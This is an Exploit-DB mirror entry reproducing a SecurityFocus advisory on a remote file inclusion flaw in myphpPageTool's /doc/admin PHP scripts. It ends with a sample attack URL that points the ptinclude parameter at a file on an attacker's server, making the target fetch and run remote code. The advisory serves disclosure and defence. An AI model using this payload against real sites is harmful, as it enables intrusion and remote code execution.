exploit-db-mirror/exploits/php/webapps/22208.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

7 lines
No EOL
517 B
Text

source: https://www.securityfocus.com/bid/6744/info
myphpPageTool is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in several PHP script files in the /doc/admin folder.
Under some circumstances, it is possible for remote attackers to influence the include path for 'pt_config.inc' to point to an external file on a remote server by manipulating some URI parameters.
http://[target]/doc/admin/index.php?ptinclude=http://[attacker]/pt_config.inc